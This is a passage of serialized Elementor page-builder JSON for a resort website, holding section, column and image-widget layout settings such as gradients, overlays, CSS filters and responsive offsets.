gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f79900a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c62f6fe\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"03f9966\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"b8cd8b3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/IMG_20160529_165358_102.jpg\",\"id\":171},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b577c8c\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height\":{\"unit\":\"px\",\"size\":400,\"sizes\":[]},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"structure\":\"40\",\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"021ef74\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1b48237\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"315f485\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"shape_divider_top_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[{\"id\":\"32dfd9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9e22c3f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a9d368f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5526c8c\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"1a58fd3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3810.jpg\",\"id\":495},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet